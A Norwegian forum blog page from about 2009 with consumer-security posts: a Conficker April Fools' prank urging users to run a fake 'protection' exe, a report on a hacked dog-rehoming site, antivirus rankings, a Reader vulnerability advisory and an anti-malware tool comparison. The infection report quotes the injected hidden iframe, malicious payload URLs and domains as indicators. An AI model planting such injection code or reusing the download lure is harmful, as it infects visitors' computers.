Gå til innhold

norbat

Medlemmer
 Vis profil  Se deres aktivitet

  • Innlegg

    8 388

  • Ble med

  • Besøkte siden sist

 Innholdstype 

Blogginnlegg skrevet av norbat

  1. norbat

    Aprilspøk

    Av norbat,

    Den rimelig kjente ormen Conficker var programmert til å endre seg 1.april. Noen av endringene var kjent (bla. generering av 50 000 domenenavn). Hva den nye varianten egentlig vil gjøre er imidlertid ikke helt kjent men det som er helt opplagt er at det er et botnett som er bygd opp med anslagsvis 10 mill pc'er.
     
    Selv om vi skal ta denne type trusler alvorlige, så er det vel slik at denne type ting heller ikke er fredet for spøk - spesielt 1.april
     
    Samtidig så var det en liten motreaksjon mot alle nettavisene som spådde dommedag med blikkfang som 'Nå smeller det" og "Sikkerhetseksperter skjelver..." m.fl. Det som ikke ble nevnt er at målet for denne versjonen (Conficker C) var de pc'ene som allerede er infisert med Conficker og de pc'ene som fortsatt ikke har oppdatert sin Windows siden oktober 2008 (at piratversjoner av Windows i mange tilfeller ikke får oppdatert er ingen hemmelighet.)
     
    Aprilspøken inkl. 'beskyttelsesprogrammet' finne her: http://www.diskusjon.no/index.php?showtopic=1093473. Kan også leses under.
     
    Conficker har peilet seg inn på diskusjon.no
    Den mye omtalte Conficker-C ormen vil som kjent bli aktivert 1.april (se artikkel på bla hardware: http://www.hardware.no/artikler/ny_confick...s_1_april/68520. Denne ormen (som også finnes i en A og B-variant), har utvidet generering av domener fra 250 pr. dag til 50 000 pr. dag.
     
    Algoritmen som lager domenenavnene er kjent.
     
    Så langt har det vært få 'kjente' nettsteder som ormen har koblet seg til. Nå har dessverre diskusjon.no blitt en del av botnettet og ett av domenen som ormen aktiverer i løpet av 1.april:
     
    ....
    C, 01/04/2009, 0, muocf.com
    C, 01/04/2009, 1, slnsepl.info
    C, 01/04/2009, 2, hznvnbclb.ws
    C, 01/04/2009, 3, tgpdjdlk.info
    C, 01/04/2009, 4, diskusjon.no
    C, 01/04/2009, 5, dophzgto.se
    C, 01/04/2009, 6, snfzhmej.net
    C, 01/04/2009, 7, igcrfrqqud.com
    C, 01/04/2009, 8, dcvqntv.ws
    ....
    Lengre ned på lista finnes noen andre .no-domener:
     
    C, 01/04/2009, 1732, wow.no
    C, 01/04/2009, 23550, sas.no
    C, 01/04/2009, 37893, nav.no
     
     
    Ueland er klar over tilfellet og i samarbeid med sikkerhetseksperter (fra Milton Security) er det laget en beskyttelse som gjør at din bruker ikke vil bli berørt om ormen skulle spre seg i nettverket. Hvis beskyttelsen ikke kjøres, vil din pc stå i fare for å bli infisert via din bruker når du logger deg inn på forumet.
     
    Aktiveringen av ormen skjer kl. 15.00 norsk tid, 1.april. Alternativet er at man holder seg borte fra forumet mellom kl. 15 og 24, men beskyttelsen fungerer, så det skulle ikke være noe å vente med:
     
    1. Last ned zip-fila, pakk den ut på skrivebordet og kjør fila (Diskusjon.exe)
    2. Skriv inn brukernavnet ditt i programmet og klikk på Beskytt
    3. Brukernavnet ditt vil nå være beskyttet mot ormen slik at ormen ikke sprer seg videre.
     

     
    Hvis du fortsatt sitter med noen spørsmål rundt sikkerheten til forumet og din bruker, send en pm til Ueland eller Dotten som er de tekniske/ansvarlige for forumet.
     
    Som flere nettaviser har påpekt, er 1.april en litt uheldig dato for slike meldinger da de fleste vet at datoen blir brukt til aprilspøk. De som står bak ormen, har nok tatt dette med i betraktningen da de satte aktiveringsdatoen. Dette må tas alvorlig da denne ormen har utviklet seg til en 'epidemi' med over 10 millioner infiserte pc'er. Forumet har lagt ned store ressurser for å forhindre at brukerene blir infisert. Milton Security har i samarbeid med flere norske forum laget fixer der brukeridentene blir beskyttet mot dette.
  2. norbat
    Selv for en dyrevenn så er ikke alt som lukter hund, bra. Nettstedet 'hxxp://www.omplasseringavhunder.no' er fortiden infisert med malware som prøver å utnytte kjente sårbarheter knyttet til div. program.
     
    Javascript-injeksjonen, som er lagt inn på siden, henter info fra:
    <iframe id="1e321863e201f914ad22f7669a83199d" name="d9660710064c187e1f82343133ab4fe1" width=1
    height=1 frameborder=0 src="hxxp://thehugetitstop.cn/dontstop.html"></iframe>
     
    Via redirect :
    hxxp://vpsspeedin.ru/x/pdf.php -> henter en infisert .pdf-fil (adobe reader)
    hxxp://vpsspeedin.ru/x/load.php?id=x -> henter en TrojanDownloader, XPpoliceAntivirus
     
    Domener involvert:
    thehugetitstop.cn 91.212.65.33
    gianthighestfind.cn 91.212.65.33
    tozxiqud.cn 91.212.65.7
    vpsspeedin.ru 91.212.65.33
    ralcofic.cn 91.212.65.7
    8addition.info 210.48.154.132
     
    I tillegg er det tegn på at pc'n vil bli forsøkt inkl. i et botnet knyttet til epost-spam.
     
    Infeksjonen er vanlig og prøver å utnytte kjente sårbarheter knyttet til
    Flash Player
    Adobe Reader
    Office Snapshot Viewer
     
    Tiltak er å holde programmene (inkl antivirus) oppdatert. Benytt gjerne F-secure sin Health Check
  3. norbat
    En rapport fra Secunia som tar for seg bla. sårbarheter i nettlesere i 2008, kommer Opera godt ut i motsetning til Firefox. Hvor alvorlige disse sårbarhetene er, nevnes ikke i rapporten. Sårbarhetene knyttet til Firefox, kan lese her: http://www.mozilla.org/security/announce/.
    Operas endringslogg: http://www.opera.com/docs/changelogs/windows/
     

     
    Ser vi på sårbarheter knyttet til plug-in, er ActiveX (som IE bruker) fortsatt den dominerende.
     
    Kilde: Secuniarapport 2008
  4. norbat
    På tross av at Microsoft har patch for sårbarheten som Downadup/Conficker utnytter, er det millioner av pc'er som er infisert.
     
    Når ormen har infisert en PC, vil Downadup genererer en liste med over 250 mulige domener -
    listen endres daglig - velger ett, og deretter bruker ormen denne webadressen for å nå en
    hacker-styrt server som det laster ned mer ondsinnet programvare på den kaprete datamaskinen.
     
    I mars, har ormen 7750 domenenavn den kan bruke. Domenenavnene er tilfeldige tegn uten relevans til allerede eksisterende, legale domener - dvs. det finnes unntak. Er man uheldig og drifter jogli.com (en musikk-side), så står dette domenet på mars-liste til ormen (nærmere bestemt 8.mars). Selv om dette domenet ikke vil svare, så vil antall infiserte pc'er som kontakter et domene en bestemt dag kunne føre til overbelastning (i hovedsak føre til en 'denial of service' angrep).
     
    http://www.diskusjon.no/index.php?showtopic=1081733&hl=
  5. norbat
    En test gjennomført av SRI Malware Threat Center, viser at Avira og AVG kommer best ut når ny malware binærfiler blir testet mot antivirusprogrammene man finner på bla. Virustotal.
     
    Intensjonen med testen var å finne ut hvilke sikkerhetsprogram som detekterte ny malware. Testen presiserer at de fleste antivirusprogrammer vil få deteksjoner mot truslene innen noen få dager(men det hjelper jo ikke der og da).
     
    Topp 10:
    1 91% AntiVir Avira
    2 91% Sophos Labs
    3 91% Grisoft Inc
    4 90% Ikarus SecuritySoftware
    5 90% Microsoft
    6 90% BitDefender
    7 88% Norman Inc
    8 88% Kaspersky
    9 87% F-Secure
    10 86% Avast
     
    Bunn 5:
    28 59% Ewido Ewido Networks
    29 28% Webwasher-GatewaySecure Computing
    30 22% NOD32v2 ESET LLC
    31 18% Prevx1
     
     
    Kilde: http://mtc.sri.com/live_data/av_rankings/
  6. norbat
    I helga var både nettsidene til mpx.no og fotovideo.no infisert med trojanere. De som hadde antivirusprogram som detekterte dette, slapp å få pc'n full av badware.
     
    Slike Drive-by infeksjoner har blitt ganske så vanlige og dette setter igjen fokus på at som pcbruker, er det meget viktig at man holder sine programmer oppdaterte. Vi snakker ikke bare om Windows og Antivirusprogram, men også om andre programmer som lett går i glemmeboka når man tenker på oppdatering - Adobe Reader, Java, Real Player, Flash Player etc.
     
    Det finnes noen programmer som kan sjekke tilstanden til de programmene du har installert. En onlineversjon finnes på F-secure (bruk IE). Du har også en variant på Secunia
     
    Surf trygt!
  7. norbat

    Skumle PDF-filer

    Av norbat,

    En kritisk sårbarhet har blitt identifisert i Adobe Reader 9 og Acrobat 9 og tidligere versjoner. Dette sikkerhetsproblemet kan føre til at programmet krasjer og kan potensielt tillate en angriper å ta kontroll over det berørte systemet. Det er rapporter om at dette problemet blir utnyttet.
     
    Adobe forventer å gjøre tilgjengelig en oppdatering for Adobe Reader 9 og Acrobat 9 11 mars 2009
    Ref. http://www.adobe.com/support/security/advi.../apsa09-01.html
     
    Skadelig PDF-filer som utnytter sårbarheten blir av Symantec oppdaget som Trojan.Pidief.E. Payloaden blir detektert som backdoor.trojan. Denne trojaneren gjør at 'angriperen 'ser skrivebordet', registrerer tastetrykk og får ekstern tilgang til pc'n.
     
    Mens man venter på patchen fra Adobe, bør/kan gjeldene forhåndstiltak benyttes:
    1. bare åpne e-postvedlegg fra personer du stoler på.
    2. Deaktivering av JavaScript i Adobe Reader
    3. Aktivering av DEP for Adobe Reader
     
     
    Hvordan deaktivere Javascript i Adobe Reader:
    1. Åpne Adobe Acrobat Reader
    2. velg Rediger->Innstillinger
    3. Velg Javascript
    4. Fjern merket ved Aktiver Acrobat Javascript
     
    Aktivering av DEP for Adobe Reader:
    Se How-DEP-can-protect-your-PC (engelsk)
  8. norbat
    HW.no har testet Ad-Aware og Spybot og det kommer gjerne kommentarer på slik. At disse to programmene er såpass populære, må skyldes medieomtalen de får, for snakker vi om malwarefjerning, så er det ikke disse to programmene som bør benyttes - først.
     
     
    Slik skulle kanskje artikkelen ha vært:
     
    Hvorfor sammenligne to brødbokser når kjøleskapet kan friste med bedre kvalitet.
     
    Det siktes til disse to programmene, Ad-Aware og Spybot. Når man er innom temaet malware/spyware, så blir disse to programmene nesten uten unntak bestandig nevnt. Antakelig fordi de har vært lenge i markedet (som gratisprogram), og 'before 2000' (ikke 'beyond 2000'), så var disse to programmene rimelig gode, i mangel av bedre alternativer?
     
    Så, la oss se litt på dem vs. andre programmer som antakelig gjør jobben bedre og raskere. Hvilke andre program det siktes til? - Vel, heng på, så får du vite det.
     
    Hvis man går ut fra en gjennomsnitts pcbruker, en pcbruker som i all hovedsak bruker pc'n som et verktøy (surfe, lese/sende epost, officepakken, photoshop element, bestille flybillett og nettbank), og ikke som en boks til å teste ut alt som kan testes, så kan valg av sikkerhetsløsning av og til være en forvirrende affære. Forvirrende fordi det er ikke bestandig slik at sikkerhetsprogrammet gjør jobben brukervennlig nok eller godt nok.
     
    Nå, la oss se på programmene som er plukket ut til denne testen:
    Ad-Aware 2009
    Spybot Search and destroy 1.6.2
    Malwarebytes Anti-Malware
    SuperAntiSpyware
    Spyware Doctor (Starter Edition)
    Spy Sweeper 6.0
    a-squared Free 4.0
     
     
    Ad-Aware 2009 (Nedlastingfil: 33 MB)
    Et svært populært program, som så og si alltid blir nevnt når man berører temaet spyware og annen malware.
     

     
    Programmet har et fint grensesnitt. Spørsmålet er: hvorfor finnes det ikke en nordisk språkdrakt til dette svenske programmet?
    Ønsker ikke Lavasoft at bestemora mi skal benytte programmet?
    Det hjelper ikke at man kan skifte drakt-farge.
     
    La oss se programmet i arbeid.
    Man kan velge mellom Smart scan, Full scan og Profile scan. Profile scan kan konfigureres slik at man bestemmer noe selv hva man vil skanne.
     
    Smart scan
    Skanner 'kun' de mest kritiske plassene på pc'n (les: typisk plassering av malware). Kunne like godt vært kalt for rask skann, for det er tilfellet.
    Tidsbruk: 54 sek.
    Antall objekter sjekket: 21000
    Hva ble funnet: En Zlob (registeroppføring) og 13 cookies.
     
    Full scan:
    Dette er en 'in-depth' skann. Den skal skanne hele pc'n inkl. alle hdd.
    Tidsbruk: 25 min.
    Antall objekter sjekket: 56500.
    Hva ble funnet: En Zlob, 13 cookies og 8 Suspicious objects.
     
    Vurdering:
    + Rask skann ved Smart scan-valg
    + 'Sanntid-søk'
    + Pent brukergrensesnitt
     
    - Utelot en viktig malwarefil (en fil som var knyttet til en MSN-orm som var aktiv for kort tid siden.)
    - Skaper forvirring knyttet til hva man skal gjøre med Suspicious objects. Sletter man noen her, risikerer man at noen programmer ikke fungerer etterpå.
    - Alle Suspicious objects var legale filer, men det hadde ikke bestemora mi visst, så hun hadde nok ringt.
    - Pc må restartes etter installasjon
    - Mangler nordisk språk.
     
     
    Spybot Search and destroy 1.6.2 (Nedlastingsfil 15.6 MB)
    Programmet har norsk språkdrakt, noe man velger under intallasjonen.
     

     
    Har du Ad-Aware intallert fra før, vil dette programmet komme med en advarsel om at dette kan føre til at ad-aware finner infiserte filer i arkivet (backup av det spybot evt. fjerner) til spybot. Det er flere program som gjør dette, men muligens så er det vanlig å bruke en kombinasjon av Ad-Aware og Spybot slik at dette er et kjent fenomen med denne kombinasjonen?
     
    Med Spybot, ligger det et program som heter TeaTimer. Dette progammer er laget for å beskytte systemfiler. Man får valg om å installere TeaTimer under intallasjonen. Dette programmet maser en god del når det skjer 'endringer', og vil nok ikke passe alle og enhver. Hva skal man tillate og hva skal man blokkere?

     
    Man vil også få et valg om å ta backup av hele registeret i starten. Dette er ikke nødvendig, som programmet selv sier, så da gjør vi ikke det.
     
    Så kommer spørsmålet om immunisering. Denne funksjonen skal forhindre at det skjer endringer uten viten og vilje i nettleserene (inkl. hosts-fila)
     
    Programmet kan ikke kalles pent, men det har en god del funksjoner (tilgjengelig fra Avansert modus).
     
    Spybot har ett søkemodus - Søk etter problemer. Søker ut fra en predefinert liste, som i skrivende stund består av 386991 oppføringer.
     
    Tidsbruk: ca. 25 min.
    Hva ble funnet: Ikke noe!. Verken Zlob eller annet rusk. Programmet fant/varslet om en suspekt registeroppføring, men den er godkjent av meg. Regner med bestemor hadde ringt.
     
    Vurdering:
    + Norsk språk
    + Immunisering
     
    - Fant ingen infeksjonsfiler
    - 'Fryktelig' mange valg under installasjonen.
    - Falsk trygghet?
     
     
    Malwarebytes Anti-Malware (Nedlastingsfil: 2,8 MB)
    Noe pent brukergrensesnitt kan man ikke si det har. Men, det har språk på norsk! Programmet har et enkelt utseende, arkfanebasert. Har få ekstrafunksjoner, men inneholder FileAssassin som kan slette låste filer.
     

     
    Man kan velge mellom Rask skann og Full skann. MBAM har Heuristics søk også i gratisversjonen, som betyr at den detekterer suspekt plassering/oppførsel til filer.
     
     
    Rask skann:
    Tidsbruk: 3 min og 50 sek,
    Antall objekter sjekket: 62000.
    Hva ble funnet: En Zlob (registeroppføring), en browser-hijacker (registeroppføring) og en Backdoor.bot (fil, plassering, C:\ )
     
    Full skann:
    Tidsbruk: 27 min,
    Antall objekter sjekket: 94000
    Hva ble funnet: Det samme som i rask skann.
     
    Vurdering:
    + Rask Skanner
    + God deteksjon. Finner det den skal. Undertegnede bruker alltid Rask skann og resultatet forklarer hvorfor.
    + Filer som ikke lar seg slette umiddlebart, blir fjernet under restart av pc'n da programmet vil be om en slik restart ved slike filer.
    + Norsk språk.
     
    -
     
     
     
    SUPERAntiSpyware (Nedlastingsfil: 5,5 MB)
    Som MBAM, har ikke SAS noe spesielt pent brukergrensesnitt. Navnet får også noen til å myse litt. Programmet har en blanding mellom knapper og faner for å navigere i programmet.
     

     
    Det som er svært gledelig, er at programmet nå kommer i norsk språkdrakt, noe man velger under installasjonen. Det som setter en ekstra piff, er at programmet har en del reparasjoner/fixer for div. elementer som ofte kan bli korrupte ved malwareinfeksjoner (eks. winsock m.fl)
     

     
    Ved skanning, har programmet 3 valg: Rask skann, komplett skann og egendefinert skann. I egendefinert skann, har man mulighet til å velge hvilke mapper man ønsker skannet.
     
    Rask skann:
    Tidsbruk: 6 min.
    Antall objekter sjekket: 6000.
    Hva ble funnet: en Worm-SODSBOT (backdoor.bot hos MBAM) og 3 cookies
     
    Komplett skann:
    Tidsbruk: 19 min.
    Antall objekter sjekket: 20500
    Hva ble funnet: Det samme som i rask skann.
     
    Vurdering:
    + Rask skanner
    + Finner de virkelige bad boys
    + Har flere fixer for ulike element som kan bli korrupte ved infeksjoner
    + Et kompakt program med mange funksjoner
    + Norsk språk
     
    -
     
     
    Spyware Doctor (Starter Edition) (nedlastingsfil: 29 MB)
    Dette programmet kan lastes ned gratis via Google Pack. Google Pack inneholder en bunke med Google stuff (picasa, earth etc.), men man bestemmer selv hva man ønsker å installere.
     
    Spyware Doctor har norskt språk og brukergrensesnittet er pent.

     
    Man får spørsmål om å starte IntelliGuard - sanntidsbeskyttelsen. I denne versjonen gjelder denne beskyttelsen nettleser, filer og de nyeste AktiveX-truslene. I en oppgradert versjon (må betale), beskytter IntelliGuard også Nettverksinntillingene, Prosesser - bla. mot rootkit og Startup - hindrer fiendtlige programmer fra å konfigurere seg selv ved å starte opp automatisk.
     
    Programmet tilbyr også Immunisering.
     
    En nyttig default innstilling er at prog. vil spørre om å opprette et 'gjenopprettingspunkt' før fjerning av evt. malware. Dette kan være nyttig fordi det er ikke uvanlig at det kan oppstå problemer i etterkant av malware (på generell basis)
     
    Programmet tilbyr 2 typer søk: Intelli-scan og Fullt søk
     
    Intelli-scan:
    Tidsbruk: 59 sek.
    Elementer gjennomsøkt: 201000
    Hva ble funnet: Trojan.FakeAlert (registeroppf. MBAM kaller den Zlob)
     
    Fullstendig søk:
    Tidsbruk: 25 min.
    Elementer gjennomsøkt: 249000!
    Hva ble funnet: 1 trussel og 112 infeksjoner!?
    Trussel: FakeAlerten (zlob). De 112 infeksjonene var en mulig hijacking. Det viste seg at de var knyttet til hosts-fila (lagt inn av spybot for å forhindre tilgang til en god del kjente malwaresider)
     
    Vurdering:
    + Rask skanner
    + Går grundig til verks og melder om det meste av 'mistenkeligheter' (se - )
    + Sanntidsøk/beskyttelse (delvis)
    + Immunisering
    + Kan lage systemgjenopprettingspunkt før sletting av malware.
    + Fint brukergrensesnitt
    + Norsk språk
     
    - Fant ikke den 'alvorligste' trusselen, en backdoor.bot fil
    - Finner det meste av mistenkeligheter - også legale endringer. Dette kan skape usikkerhet eller at man rett og slett bare sletter og får problemer med div. programmer i etterkant.
     
     
    Spy Sweeper 6.0 (nedlastingfil: 36,1 MB)
    Dette programmet tilbyr "Get free scan" - skann, men ikke fjern malware før du betaler lisens. Det er helt greit og derfor skulle programmet egentlig ikke ha vært tatt med i denne 'testen', men fordi den ofte nevnes blant de beste, så sier vi ja takk til en 'get free scan'.
     
    Under installasjonen får man valget om å intallere Webroot Spy Sweeper eller Webroot Antivirus with Antispyare.
    Jeg er interesser i Antispywareprogrammet og velger Spy Sweeper.
     
    Under installasjonen må man registerer seg med en gyldig epost-adresse. Jeg velger spam-adressen fordi jeg orker ikke div. tilbud og annen 'nyttig' info fra dem.
     
    Viktig: Det følger med 'adware' i form av Ask toolbar and Search Assistant, så før du trykker next og yes til alt, fjern dette valget.
     
    Når pc'n starter opp igjen, kjøres en Wizard - veileder.
    Det første den gjør er å kjøre en liten skann (memoryscan)
    Når veiledningen er ferdig, er man klar til å bruke/konfigurere programmet.
     
    Brukergrensesnittet gir en blandet følelse.

     

     
    Programmet har sanntidsøk/beskyttelse og de kalles Shields (Web browers, Network, Windows system, Startup og e-mail attachments shields). Det kommer stadig melding om at Network shields har blokkert tilgang til sider som inneholder malware. WHAT?
     
    Man får tilgang til det meste via tray-iconet (høyreklikk på spysweeper-iconet nede i systemfeltet)
     
    Spy Sweeper tilbyr Quick, Full og Custom-scan. Pr.dato har Spy Sweeper 323669 definisjonsoppføringer som den scanner imot.
     
    Quick scan:
    Tidsbruk: 9 min
    Objekter sjekket: 15 000 filer/mapper, 115 000 registeroppføringer
    Hva ble funnet: Ikke noe
     
    Full scan:
    Tidsbruk: ca. 20 min
    Objekter sjekket: 45000 filer/mapper, 115 000 registeroppføringer
    Hva ble funnet: Ikke noe
     
    Vurdering:
    + Sanntidsbeskyttelsen fungerer uten 'subscribe'
     
    - Fant ingen trusler, selv om det ligger minst 1 seriøs sak på pc'n.
    - Brukergrensesnittet er rotete, masse innstillinger. Kunne godt ha hatt en 'enkel' modus.
    - Inneholder Adware i form av ASK Toolbar
    - Må oppgi epostadresse under installasjonen.
     
     
     
    a-squared Free 4.0 (nedlastingsfil: 44.4 MB)
    Programmet har et enkelt brukergrensesnitt, ryddig, men mangler nordisk språkdrakt.

     
    Ønskes sanntidsbeskyttelse etc. finnes det en betalingsversjon (A-squared Anti-Malware)
     
    Søkevalgene er Quick scan, Smart scan, Deep scan og Custom Scan.

     
    Quick scan:
    Tid: 5 min
    Antall objekter sjekket: ca 1700
    Hva ble funnet: Ikke noe suspect
     
    Smart scan:
    Tid: 30 min
    Antall objekter sjekket: 44000
    Hva ble funnet: Ikke noe suspect
     
    Full scan
    Tid: 40 min
    Antall sjekket: 61000
    Hva ble funnet: 1 Backdoor.IRCBot, 3 trojanere i c:\Found.008-mappa. Disse FOUND-mappene blir opprettet av checkdisk/scandisk når det har vært en filsystem-korrupsjoner. Har ingen innvirkning på pc'n. Det er allikevel prisverdig at programmet tar de med.
     
    Ved funn velger man om man vil sette objektet i karantene eller slette det.
     
    Vurdering:
    + God deteksjon ved full skann
    + Enkelt brukergrensesnitt
     
    - Skanningen oppleves treg
    - Full skann må benyttes da de andre skannermodusene leter på 'feil plass'.
     
     
    Oppsummering / konklusjon:
    Etter å ha tatt en titt på de nevnte programmene, så er det raskt noen som skiller seg ut. Ikke på på grunn av utseendet, men på evnen programmet har til å fjerne problemet (les: malware).
     
    Mange programmer lover en hel del, og mange programmer tilbyr funksjoner i form av skjold (Shields) og immunisering. At designet på programmet er tiltalende, kan også være en måte å fronte programmet på.
     
    Problemet eller utfordringen er uansett at programmets evne til å detektere malware er avhengig av at programmet har de riktige definisjonene. Uten disse, vil malware snike seg unna og leve gode dager på pc'n. Det kan hjelpe med såkalt heuretic skannerfunksjon (deteksjon ut fra oppførsel/plassering av filer). Utfordringen knyttet til dette er at man i mer eller mindre grad får såkalte falske positiver.
     
    Det bør også nevnes at når programmene har funnet noe, så bør man velge å sette objektet i karantene (hvis det er mulighet for det) framfor å slette objektet direkte. Dette på grunn av at alle programmer kan melde falske positiver. Ved å sette objektet i karantene, kan man, hvis det viser seg at det var en falsk positiv, gjenopprette file. Om alt fungerer som vanlig, så kan man heller tømme karantenemappa i ny og ned for å fjerne objektet helt.
     
    Uten noe mer mikk-makk, så er dette konklusjonen:
    Skal du velge ett antimalwareprogram, så går du for Malwarebytes Anti-Malware.
     
    Deretter er programmet SuperAntispyware et meget godt alternativ.
     
    Disse programmene bør vurderes da de virker solid og har evnen til å finne det meste: a-squared og Spyware Doctor.
     
    Ad-Aware, Spybot og Spy Sweeper kan vi glemme - en stund.
     
     
    Etterord:
    Denne 'testen' må tas for det den er - en kommentar til at ad-aware og spybot til stadighet blir dratt fram i media. Den 'infeksjonen' som lå på testpc'n (en Acer bærbar, 60 gb hdd, 1,8 Mhz, 1 Gb minne, XP Pro) kan på ingen måte avgjøre hvilke av de 4 programmene som er best - men, infeksjonen var reel, noen uker gammel, og seriøse anti-programmer burde minst ha oppdaget backdoor.bot-fila som lå på pc'n.
×
×
  • Opprett ny...